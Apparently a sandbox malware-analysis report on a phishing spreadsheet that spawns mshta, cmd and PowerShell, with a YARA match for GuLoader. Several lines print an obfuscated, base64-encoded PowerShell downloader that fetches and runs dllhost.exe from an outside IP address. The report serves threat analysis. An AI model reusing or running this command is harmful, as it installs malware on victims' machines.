          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: brandbombernes.lnk.11.drLNK file: ..\Users\user\AppData\Local\Temp\nsmA3F.tmp\cueca.Stu
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Automation.pdb source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdb source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbu source: powershell.exe, 00000007.00000002.449310498.000000001C4D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdbhP source: powershell.exe, 00000007.00000002.434786957.000000000312A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdb source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000018.00000002.902448214.0000000000491000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdbD7 source: powershell.exe, 0000000C.00000002.777378103.0000000000442000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdbhP source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: Automation.pdbG source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: 54230000.0.drInitial sample: OLE indicators vbamacros = False
          Source: PO 11001 .xlsInitial sample: OLE indicators encrypted = True

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 34.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 35.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 36.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 39.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 40.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 42.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 46.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 47.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 49.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 51.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 52.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 55.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Yara detected GuLoader
          Source: Yara matchFile source: 00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          PowerShell case anomaly found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
